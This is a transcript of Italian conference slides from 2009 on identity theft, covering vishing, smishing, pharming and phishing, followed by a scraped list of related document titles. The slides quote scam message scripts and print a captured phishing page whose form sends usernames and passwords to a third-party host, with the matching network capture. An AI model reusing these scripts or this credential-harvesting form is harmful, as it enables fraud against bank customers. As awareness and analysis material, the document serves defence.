Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009"

Transcript

1 Identity management Access nel web 2.0 Associazione Aica, Genova, 15 Settembre 2009 Maurizio Aiello Consiglio Nazionale delle Ricerche Istituto di Elettronica ed Ingegneria dell'informazione e delle Telecomunicazioni

2 Furto di identità Social Engineering Phishing Vishing (Voice Phishing) Smishing (Sms phishing) Pharming (Attacchi DNS)

3 Social Engineering Studio del comportamento individuale al fine di carpire informazioni Migliore tecnica di crittanalisi attuale Footprinting, studio dello stile vocale, oppressione psicologica, tecnica della riconoscenza, richiesta di aiuto, boxing, etc. Kevin Mitnick, The Art of Deception

4 Vishing Voice Phishing Basato su Voice messaging IP per praticare attacchi di social engineering volti al furto di dati (personali, finanziari, confidenziali) Perchè IP? Linee fisse sono controllabili meglio (individuazione del chiamante), inoltre in questo modo posso fare chiamate da tutto il mondo gratis.

5 Vishing: motivi del successo 1) maggior fiducia sul vettore telefono piuttosto che sulla mail 2) Maggior diffusione del telefono piuttosto che della mail (soprattutto anziani); 3) Accettazione generalizzata dei sistemi a risponditore automatico. 4) Modalità di comunicazione sincrona (rapidità d'azione) 5) Maggior personalizzazione del messaggio che costituisce l'attacco 6) Call-center <-> co.co.pro. <-> accento straniero

6 Vishing: informazioni carpite Informazioni richieste:compleanno, dettagli carta di credito e bancomat (expiration date, security codes, pin), documenti (passaporto, National Ids). 1) Accesso ai conti bancari Utilizzi dell'attacco: 2) Acquisto beni su Internet e nel mondo reale 3) Trasferimento denaro e riciclaggio (vedi prossima slide) Falsificazione documenti (ad un controllo telematico tutto è ok).

7 Scenario: riciclaggio Ad Alice (Italia) vengono rubate le credenziali di accesso al conto Bob viene convinto tramite vishing ad effettuare transazioni Italia Estero trattenendosi il 10% Eve riceve da Bob il 90% dei soldi rubati ad Alice. Vantaggi: Italia Italia non ci sono controlli da parte della banca Le indagini si concentrano su Bob inizialmente (guadagno di tempo).

8 Vishing: technological benefit Telefoni raggiunti da ogni parte del mondo (e.g. Skype?) Costi minimi Mascheramento o impersonificazione del caller-id War dialing (automatizzazione), con creazione software di call-center fake. Difficoltà a effettuare il filtraggio (come invece avviene per il phishing) Proxy per il routing internazionale dei messaggi

9 Vishing: technoogical benefits Malware per diffusione e scalabilità del message delivery Riconoscimento dei toni per acquisire numeri Riconoscimento vocale automatizzato per acquisire altri dati personali

10 Vishing: esempio tramite Attacco simile al phishing, al posto dell'url c'è un numero di telefono da chiamare (Nazionale! Vedi skype) Caro cliente,... Banca XXX per proteggere i tuoi soldi ha bloccato il conto. Chiama lo 02/ per verificare i tuoi dati. Si esegue la chiamata, 4 o più scelte: 1 per movimenti e saldo conto 2 per effettuare transazioni 3 per sbloccare un conto bloccato 0 per parlare con un operatore

11 Vishing: Dobbiamo verificare... e in rapida successione: Numero di conto Data e luogo di nascita Numero di carta d'identità Pin e codici vari per l'accesso via Internet Alla fine viene effettuato il trasferimento verso operatore: Vero, rerouting verso call center reale Fake, cade la linea

12 Skype:numero regionale

13 Vishing: esempio voic Spingono a effettuare risposte immediate basate su bisogni effettivi: Come da lei richiesto domani sarà chiusa l'erogazione di corrente elettrica presso la sua abitazione. Per il saldo finale, le informazioni relative e per parlare con un operatore chiami il 02/ Varianti e add-ons: Si chiama un numero a pagamento (899...) Si mettono in piedi veri call-center alternativi ai risponditori automatici

14 Vishing: varianti Interviste a pagamento, al termine si chiedono tutti i dettagli (e qualcosa in più :-) del conto corrente per l'accredito Dumpster boxing: individuato il soggetto si cerca nel suo trash (es. le ricevute dei prelievi bancomat) e si eseguono attacchi personalizzati basati su conoscenza di fatti riservati (es. num. Bancomat o carta di credito)

15 Vishing:tracciabilità Chiamate uscenti: Fake caller-id Chiamate voip da internet, stessa difficoltà che tracciare un pc che commette abusi Chiamate entranti verso un call-center fake: Linea telefonica registrata con documenti falsi Linea voip (es. Skype): riesco a trovare gli estremi della carta di credito del criminale e basta User skype rubato, addebiti pagati con carte rubate.

16 Vishing: mms e sms E' stata richiesta l'apertura di un nuovo fido su Banca XXX; in caso questa richiesta non sia autorizzata da lei contattare 02/ Da proprio provider telefonico: hai superato il limite di traffico gratuito del mese: rispondi con il tuo codice della carta di credito per avere ulteriore traffico a 3euro. Scarica loghi, suonerie, gratuitamente!!!

17 Smishing: SMS Phishing Invio di sms fake tramite software ad-hoc che consente la manipolazione del mittente: software firesms siti smsforge.net, (da verificare) Attenzione, chiami il numero xxxxxxx di Servizi Interbancari per verificare la transazione della sua carta di credito al fine di evitarne usi fraudolenti Richiesta codici (voce preregistrata) e successiva attesa operatore non disponibile.

18 Smishing: converging technologies Lo hook (entità che cattura le informazioni) può essere sia un sito web (phishing) che un call-center (vishing) Si possono usare sia i telefoni sms che i gateway web per inviare i messaggi sms fake Si sono visti troiani (eliles.a) che si installano sul pc, si propagano come worm, tramite sms gateway fanno smishing con il target di inserire un troiano dentro Nokia N60.

19 Smishing: SMS Phising Motivi del successo: accettazione del cellulare come mezzo più riservato della posta elettronica (falso, war dialing, elenchi su web, vendita usato etc.) Accettazione della chiamata da/verso call center più facilmente che non contatto tramite web Truffa ai danni di Carta Sì, usando come mittente TIM o VISA.

20 Pharming Dopo attacco (spoofed server) Il server spoofed si presenta identico in tutte le sue forme a quello originale!! (normale phishing)

21 Pharming: motivi successo Di solito si controllano i link: https://www.posteitaliane.ru No possibilità di controllo (dovrei interrogare DNS autonomi) Siti clonati perfettamente (ad es. acquistando un conto vero e facendo prove).

22 Pharming: info rubate Normale transazione: user, password, pincode vari richiesti durante la transazione Dati aggiuntivi richiesti ad-hoc: anagrafica, altri conti, assicurazioni, familiari etc.

23 Pharming: tecnologia Intrusione e modifica del Dns del provider della banca o via social engineering o tramite attacco diretto Dns cache poisoning sul provider della vittima Inserimento di troiano nel pc vittima e modifica del file c:\windows\system32\drivers\etc Inserimento di troiano nel pc vittima e modifica del registro con cambiamenti dei dns predefiniti.

24 Pharming: difese Buon antivirus Personal Firewall con controllo di accesso siti (quasi infattibile nella realtà Controllo dei certificati digitali offerti dai server (quasi certamente non eseguito)

25 Pharming: varianti e to-do Man in the middle attacks: le informazioni vengono carpite, usate per autenticarsi sul server vero e di conseguenza mostrate all'utente, aumentando la confidenza e la sensazione di sicurezza dello stesso.

26 Phishing Attacco proveniente da Solite tecniche di social engineering (il conto verrà chiuso, ci sono degli addebiti anomali, controllo delle credenziali etc.)

27 Phishing: tecnologia SMTP sender address spoofing Riproduzione fedele dei loghi e indirizzi di posta nella mail Riproduzione fedele del layout del sito (e.g. Usando ffline browsers) Offuscamento dei link (banale, oppure utilizzando indirizzi ip al posto dei link, o indirizzi ip in notazione tutta numerica

28 Phishing: esempio pratico

29 Phihing: analisi header Received: from nameserver.ge.cnr.it (nameserver.ge.cnr.it [ ]) by gentoo2.ieiit.cnr.it (Postfix) with ESMTP id 002C41FB6AD for Wed, 2 Jan :15: (CET) X-Greylist: delayed 548 seconds by postgrey-1.16 at nameserver.ge.cnr.it; Wed, 02 Jan :30:19 CET Received: from mail.ispotclothing.com (unknown [ ]) by nameserver.ge.cnr.it (Postfix) with ESMTP id 859CB1827B for Wed, 2 Jan :30: (CET) Received: from User by mail.ispotclothing.com with SMTP (Code-Crafters Ability Mail Server 2.55); Wed, 02 Jan :21: Reply-To: it.ge.cnr.it> From: "Utente di ebay: goldenmovie" Subject: Hai ricevuto una domanda sull'oggetto Date: Wed, 2 Jan :21:

30 Phishing: esempio pratico Contenuto di zmail.ru:

31 Phishing: analisi codice <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/tr/html4/loose.dtd"><html> <meta http-equiv="content-type" content="text/html; charset=iso "><!--srcid: SignIn--> <title>benvenuto su ebay</title><script language="javascript"><!-- var pagename = "PageSignIn"; //--></script><script language="javascript"><!--... href="https://secureinclude.ebaystatic.com/css/e543/it/areatitledeployme nt_ssl_e5431it.css" media="all" rel="stylesheet"> </head> <body bgcolor="#ffffff" onload="doframesbuster();">......

32 Phishing: analisi codice <form method="post" name="signinform" onsubmit="setoptimcookie();" style="margin:0px" action=http://www2.fiberbit.net/form/mailto.cgi method=post enctype=x-www-form-urlencoded> <INPUT type=hidden value=yahoo name=mail_from> <INPUT type=hidden name=mail_to> <INPUT type=hidden value=ita name=mail_subject> <INPUT type=hidden value=http://www.ebay.it/name=next_page> <INPUT type=hidden value=0 name=smauthreason> <INPUT type=hidden value=http://olgutza.nm.ru/bpol/cartepre/grazie.txt name=target>... ID utente <td><input type="text" name="userid" maxlength="64" tabindex="1" value="" size="27"></td> <a name="password" style="text-decoration:none">password </a></td> <td><input type="password" name="pass" maxlength="64" value="" tabindex="2" size="27"></td>

33 Phishing: analisi diretta Basta perder tempo! Address A Address B Packets Bytes Packets A->B Bytes A->B Packets A<-B Bytes A<-B Risoluzione Tipo local_pc pages.ebay.it inversa local_pc www2.kjps.net inversa poi con la diretta scopro local_pc www2.fiberbit.net local_pc local_pc local_pc Akamai whois, inversa local_pc local_pc local_pc

34 Analisi pcap POST /form/mailto.cgi HTTP/1.1 Host: www2.fiberbit.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv: ) Gecko/ Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 228 Mail_From=Yahoo&Mail_To=cicciobello570%40hotmail.it&Mail_Subject=ITA&Next_Page=http%3A%2F%2Fwww.ebay.it %2F&SMAUTHREASON=0&TARGET=http%3A%2F%2Folgutza.nm.ru%2Fbpol%2Fcartepre%2Fgrazie.txt&userid=ci cciociccio&pass=ciaobello HTTP/ Found Date: Wed, 02 Jan :28:55 GMT Server: Apache/ (Unix) Location: Keep-Alive: timeout=2, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso

Sicurezza delle applicazioni web: protocollo HTTP

Sicurezza delle applicazioni web: protocollo HTTP Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2009/2010 Sicurezza delle applicazioni web: protocollo HTTP Roberto Paleari roberto@security.dico.unimi.it

Dettagli

Network Troubleshooting 101

Network Troubleshooting 101 ICT Security n. 16, Ottobre 2003 p. 1 di 5 Network Troubleshooting 101 Il titolo prettamente americano vuole rispondere al momento di panico capitato a tutti quando qualche cosa non funziona più: si è

Dettagli

INFORMATICA DISTRIBUITA. lez 5 World Wide Web (cont)

INFORMATICA DISTRIBUITA. lez 5 World Wide Web (cont) INFORMATICA DISTRIBUITA prof. lez 5 World Wide Web (cont) Università degli Studi di Milano Scienze e Tecnologie della Comunicazione Musicale a.a. 2009-2010 Protocolli usabili nelle URL http: ftp: : http://www.dico.unimi.it/

Dettagli

Attacchi Web - Introduzione alla sicurezza nelle applicazioni Web

Attacchi Web - Introduzione alla sicurezza nelle applicazioni Web Attacchi Web Introduzione alla sicurezza nelle applicazioni Web Davide Marrone davide@security.dico.unimi.it Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento

Dettagli

Uso di ACL per la protezione di una rete

Uso di ACL per la protezione di una rete Uso di ACL per la protezione di una rete Claudio Telmon Dipertimento di Informatica Università di Pisa Claudio Telmon - ACL per la protezione-1 Raccolta di informazioni Raccolta

Dettagli

Infrastrutture e Protocolli per Internet Laboratorio 1

Infrastrutture e Protocolli per Internet Laboratorio 1 Advanced Network Technologies Laboratory Infrastrutture e Protocolli per Internet Laboratorio 1 Stefano Napoli Alberto Pollastro Politecnico di Milano Laboratori Responsabili di Laboratorio: Stefano Napoli

Dettagli

Architetture Applicative Il Web

Architetture Applicative Il Web Architetture Applicative Il Web Alessandro Martinelli alessandro.martinelli@unipv.it 18 Marzo 2014 Architetture Architetture Web L Architettura Client-Server HTTP Protocolli di Comunicazione Fondamenti

Dettagli

Assignment (1) - Varie

Assignment (1) - Varie Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif Web e HTTP Terminologia Una pagina web consiste di oggetti Un oggetto può essere un file HTML, una immagine JPG, ecc. Una pagina web consiste di un file HTML base che fa riferimento a diversi oggetti al

Dettagli

Architetture Web Protocolli di Comunicazione

Architetture Web Protocolli di Comunicazione Architetture Web Protocolli di Comunicazione Alessandro Martinelli alessandro.martinelli@unipv.it 10 Maggio 2011 Architetture Web Architetture Web Protocolli di Comunicazione Il Client Side Il Server Side

Dettagli

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof. Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza

Dettagli

Il protocollo HTTP e HTTPS

Il protocollo HTTP e HTTPS Il protocollo HTTP e HTTPS Guida Apache di Openskills Introduzione al protocollo HTTP Il protocollo HTTP (Hyper Text Transfer Protocol) viene usato da tutti i client e server web e gestisce il modo con

Dettagli

Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO

Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO phishing and identity-related frauds Milano, 26 novembre 2008 Tutela dell informazione e crimini informatici

Dettagli

GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL. Come proteggersi dal PHISHING - Decalogo ABI Lab per i clienti

GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL. Come proteggersi dal PHISHING - Decalogo ABI Lab per i clienti GUIDA ALLA SICUREZZA IL PHISHING - TENTATIVI DI FRODE VIA E-MAIL Il phishing consiste nella creazione e nell uso di e-mail e siti web ideati per apparire come e-mail e siti web istituzionali di organizzazioni

Dettagli

Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni. Lezione 4

Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni. Lezione 4 Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni Lezione 4 Introduzione alle reti Materiale tratto dai lucidi ufficiali a corredo del testo: D. Sciuto, G. Buonanno e L. Mari Introduzione

Dettagli

Infrastrutture e Protocolli per Internet Laboratorio 1

Infrastrutture e Protocolli per Internet Laboratorio 1 Advanced Network Technologies Laboratory Infrastrutture e Protocolli per Internet Laboratorio 1 Stefano Napoli Alberto Pollastro Politecnico di Milano Laboratori Responsabili di Laboratorio: Stefano Napoli

Dettagli

Conservazione dei dati originali. Conformità dei dati acquisiti a quelli originali

Conservazione dei dati originali. Conformità dei dati acquisiti a quelli originali Conservazione dei dati originali Inalterabilità dei dati originali Conformità dei dati acquisiti a quelli originali Pag. 1 Sequestro di hardware: SEQUESTRO DELL INFORMAZIONE DIGITALE - Intera macchina

Dettagli

GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA

GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITA Torino, 10 dicembre 2013 LA POLIZIA POSTALE E DELLE COMUNICAZIONI 20 COMPARTIMENTI 80 SEZIONI 2000 OPERATORI Contrasto Reati Informatici

Dettagli

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Parte II - Reti di Calcolatori IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP 6-1 Applicazioni di Rete Domain Name System (DNS) Simple Network Manag. Protocol (SNMP) Posta elettronica Multipurpose Internet Mail

Dettagli

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Indice 2 Approfondamenti 3 Caro Lettore, PattiChiari è il Consorzio attraverso il quale l industria bancaria italiana lavora

Dettagli

Sicurezza: credenziali, protocolli sicuri, virus, backup

Sicurezza: credenziali, protocolli sicuri, virus, backup Sicurezza: credenziali, protocolli sicuri, virus, backup La sicurezza informatica Il tema della sicurezza informatica riguarda tutte le componenti del sistema informatico: l hardware, il software, i dati,

Dettagli

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Reti di Calcolatori IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP D. Talia RETI DI CALCOLATORI - UNICAL 6-1 Applicazioni di Rete Domain Name System (DNS) Simple Network Manag. Protocol (SNMP) Posta elettronica

Dettagli

Reti di Calcolatori. IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP

Reti di Calcolatori. IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Reti di Calcolatori IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP D. Talia RETI DI CALCOLATORI - UNICAL 6-1 Applicazioni di Rete Domain Name System (DNS) Simple Network Manag. Protocol (SNMP) Posta elettronica

Dettagli

Attacchi login: Spoofing, Sniffing, Phishing, Keyloggers

Attacchi login: Spoofing, Sniffing, Phishing, Keyloggers Attacchi login: Spoofing, Sniffing, Phishing, Keyloggers Patrick Assirelli Matteo Battaglia Gruppo 9 Corso di Sicurezza A.A. 2008/09 Introduzione Esistono diversi tipi di minacce e attacchi a cui una rete

Dettagli

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI

Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Guida alla sicurezza, in banca PER GESTIRE AL MEGLIO I PAGAMENTI ELETTRONICI Caro Lettore, PattiChiari è il Consorzio attraverso il quale l industria bancaria italiana lavora per semplificare l uso dei

Dettagli

TECN.PROG.SIST.INF. Livello APPLICAZIONE - TELNET. Roberta Gerboni

TECN.PROG.SIST.INF. Livello APPLICAZIONE - TELNET. Roberta Gerboni Roberta Gerboni Protocollo TELNET Telnet è costituito da un insieme di componenti che consentono di trasformare un computer in un terminale remoto di un altro computer. Una sessione Telnet richiede: un

Dettagli

Posta Elettronica e Web

Posta Elettronica e Web a.a. 2002/03 Posta Elettronica e Web Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/~auletta/ Università degli studi di Salerno Laurea e Diploma in Informatica 1 Posta Elettronica

Dettagli

Livello Applicazione. Davide Quaglia. Motivazione

Livello Applicazione. Davide Quaglia. Motivazione Livello Applicazione Davide Quaglia 1 Motivazione Nell'architettura ibrida TCP/IP sopra il livello trasporto esiste un unico livello che si occupa di: Gestire il concetto di sessione di lavoro Autenticazione

Dettagli

Posta elettronica e PEC

Posta elettronica e PEC Posta elettronica e PEC Lezione n. 12 Consulenti del Lavoro Client/Server Lo strato applicativo utilizza quasi sempre un architettura client/server Per ogni servizio o applicazione vi è attualmente un

Dettagli

Posta elettronica, PEC e servizi di rete

Posta elettronica, PEC e servizi di rete Posta elettronica, PEC e servizi di rete Consulenti del Lavoro AA 2010/2011 Client/Server Lo strato applicativo utilizza quasi sempre un architettura client/server Per ogni servizio o applicazione vi è

Dettagli

GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004

GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004 GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004 1. INTRODUZIONE Gli utenti autorizzati all utilizzo dei servizi SMS Kyron possono inviare messaggi SMS da applicazioni custom che

Dettagli

Worm Detection Using E-mail Data Mining

Worm Detection Using E-mail Data Mining Worm Detection Using E-mail Data Mining Davide Chiarella davide.chiarella@ieiit.cnr.it Consiglio Nazionale delle Ricerche Istituto di Elettronica e Ingegneria dell Informazione e delle Telecomunicazioni

Dettagli

Protocolli per il Web. Impianti Informatici. Protocolli applicativi

Protocolli per il Web. Impianti Informatici. Protocolli applicativi Protocolli per il Web Protocolli applicativi I protocolli applicativi 2 Applicazioni Socket interface HTTP (WEB) SMTP (E-MAIL) FTP... NFS RPC DNS... Trasporto TCP UDP Rete ICMP RIP OSPF IP ARP RARP Non

Dettagli

Provider e Mail server

Provider e Mail server Il servizio di elettronica Provider e Mail server Il servizio di elettronica o e-mail nasce per scambiarsi messaggi di puro testo o altri tipi di informazioni (file di immagini, video, ecc.) fra utenti

Dettagli

Reti di Calcolatori. Application

Reti di Calcolatori. Application Reti di Calcolatori Application Dove siamo? 2 Livello applicativo Applicazioni che utilizzano i servizi di rete Porte TCP o UDP host LAN 3 Applicazioni Programmi applicativi e servizi usati dagli utenti

Dettagli

Claudio Allocchio. SPAM? No Grazie! Claudio Allocchio. Spam? No Grazie! Firenze, 24 e 25 Gennaio 2001. III Incontro di GARR-B. III Incontro di GARR-B

Claudio Allocchio. SPAM? No Grazie! Claudio Allocchio. Spam? No Grazie! Firenze, 24 e 25 Gennaio 2001. III Incontro di GARR-B. III Incontro di GARR-B Spam? No Grazie! Firenze, 24 e 25 Gennaio 2001 Sommario Rissunto delle puntate precedenti......non c e un solo tipo di Spam! Come raccogliere le informazioni Header e logs : l impronta digitale del delitto

Dettagli

Reti di Calcolatori. Master "Bio Info" Reti e Basi di Dati Lezione 2

Reti di Calcolatori. Master Bio Info Reti e Basi di Dati Lezione 2 Reti di Calcolatori Sommario Software di rete TCP/IP Livello Applicazione Http Livello Trasporto (TCP) Livello Rete (IP, Routing, ICMP) Livello di Collegamento (Data-Link) I Protocolli di comunicazione

Dettagli

Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto

Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto CYBER RISK: RISCHI E TUTELA PER LE IMPRESE Confindustria Vicenza 26/02/2015 Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto Suddivisione territoriale Compartimenti e Sezioni

Dettagli

- SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK

- SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK - SICUREZZA - COME UTILIZZARE AL MEGLIO IL TUO INBANK La sicurezza del servizio InBank è garantita dall'utilizzo di tecniche certificate da enti internazionali per una comunicazione in Internet protetta.

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

Come lavora il CERT Difesa

Come lavora il CERT Difesa COMANDO C4 DIFESA Capo Ufficio Piani e Sicurezza e Capo del CERT Difesa TC Come lavora il CERT Difesa Col. AAras Enrico RIGHETTI Roma 30 novembre 2011 SOMMARIO Il CERT Difesa Il SOC La minaccia Conclusioni

Dettagli

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero Glossario Account (profilo o identità) insieme dei dati personali e dei contenuti caricati su un sito Internet o su un social network. Anti-spyware programma realizzato per prevenire e rilevare i programmi

Dettagli

SMSPortal. SMS-Gateway interfaccia SMTP. Versione 1.0.0. 2004, 2005, 2006 SMSPortal. Digitel Mobile Srl Via Raffaello, 77 65124 Pescara (Italy)

SMSPortal. SMS-Gateway interfaccia SMTP. Versione 1.0.0. 2004, 2005, 2006 SMSPortal. Digitel Mobile Srl Via Raffaello, 77 65124 Pescara (Italy) SMS-Gateway interfaccia SMTP Versione 1.0.0 2004, 2005, 2006 SMSPortal 1 1 Introduzione 1.1 Sommario Solo gli utenti autorizzati hanno accesso al nostro SMS Gateway e possono trasmettere messaggi SMS attraverso

Dettagli

Prof. Filippo Lanubile

Prof. Filippo Lanubile Firewall e IDS Firewall Sistema che costituisce l unico punto di connessione tra una rete privata e il resto di Internet Solitamente implementato in un router Implementato anche su host (firewall personale)

Dettagli

Reati informatici, frodi e frodi interne - quali sono e come assicurarsi - Andrea Marega Financial Lines Manager

Reati informatici, frodi e frodi interne - quali sono e come assicurarsi - Andrea Marega Financial Lines Manager Reati informatici, frodi e frodi interne - quali sono e come assicurarsi - Andrea Marega Financial Lines Manager Sommario I reati informatici: frode e responsabilità civile professionale I principali reati

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione La Rete Internet Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Che cos è Internet? Il punto

Dettagli

Attacchi login spoofing, phishing, sniffing, keyloggers

Attacchi login spoofing, phishing, sniffing, keyloggers Corso di Sicurezza A.A. 2006/07 Attacchi login spoofing, phishing, sniffing, keyloggers 17/05/2007 Giovanni Lughi 261607 Spoofing (ingannare) Insieme di tecniche atte a mascherare una persona o un programma

Dettagli

Navigare in sicurezza

Navigare in sicurezza Navigare in sicurezza Recentemente sono state inviate email apparentemente di BNL (negli esempi riportati compare come mittente "BNL Banca"), che invitano a fornire le credenziali di accesso all'area clienti

Dettagli

I rischi e le misure per rendere sicure le reti VoIP. Stefano Sotgiu

I rischi e le misure per rendere sicure le reti VoIP. Stefano Sotgiu VIP(i VoIP (in)security I rischi e le misure per rendere sicure le reti VoIP Stefano Sotgiu Agenda Il VoIP e la rete telefonica tradizionale Il VoIP più in dettaglio (SIP) Le minacce nel VoIP Cosa e come

Dettagli

Applicazioni Web 2014/15

Applicazioni Web 2014/15 Applicazioni Web 2014/15 Lezione 1 - Il protocollo HTTP Matteo Vaccari http://matteo.vaccari.name/ matteo.vaccari@uninsubria.it (cc) Alcuni diritti riservati.! Informazioni http://matteo.vaccari.name/aw

Dettagli

Applicazioni Web 2013/14

Applicazioni Web 2013/14 Applicazioni Web 2013/14 Lezione 1 - Il protocollo HTTP Matteo Vaccari http://matteo.vaccari.name/ matteo.vaccari@uninsubria.it (cc) Alcuni diritti riservati. 1 Informazioni http://matteo.vaccari.name/aw

Dettagli

UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE

UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE UNA PIATTAFORMA SICURA PER I PAGAMENTI ONLINE Marco Gallone Sella Holding Banca 28 Novembre 2006 Il Gruppo Banca Sella ed il Commercio Elettronico Dal 1996 Principal Member dei circuiti Visa e MasterCard

Dettagli

LA SICUREZZA NELLE COMUNICAZIONI TELEMATICHE: UN OBIETTIVO DI QUALITÀ NECESSARIO

LA SICUREZZA NELLE COMUNICAZIONI TELEMATICHE: UN OBIETTIVO DI QUALITÀ NECESSARIO Sei Sigma & Qualità vol. IV n. 3 259 LA SICUREZZA NELLE COMUNICAZIONI TELEMATICHE: UN OBIETTIVO DI QUALITÀ NECESSARIO Vito Santarcangelo 1, Nancy Santarcangelo 2 1 Centro Studi S.r.l., Zona Industriale

Dettagli

Realizzazione di una Infrastruttura di Sicurezza

Realizzazione di una Infrastruttura di Sicurezza Realizzazione di una Infrastruttura di Sicurezza Andrea Lanzi, Lorenzo Martignoni e Lorenzo Cavallaro Dipartimento di Informatica e Comunicazione Facoltà di Scienze MM.FF.NN. Università degli Studi di

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione La Rete Internet Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Che cos è Internet? Il punto

Dettagli

LINKSYS SPA922 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP

LINKSYS SPA922 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP LINKSYS SPA922 GUIDA ALLA CONFIGURAZIONE EUTELIAVOIP Linksys SPA922 - Guida alla Configurazione EUTELIAVOIP Rev1-0 pag.2 INDICE SCOPO...3 COLLEGAMENTO FISICO APPARATO...3 ACCESSO ALL ADMINISTRATOR WEB

Dettagli

SICUREZZA IN RETE. Versione leggera. A cura di: M. Ivan Fabris. Progetto grafico e struttura: Ing. Michele Mordenti. Release : Forlì, 2008 10 04

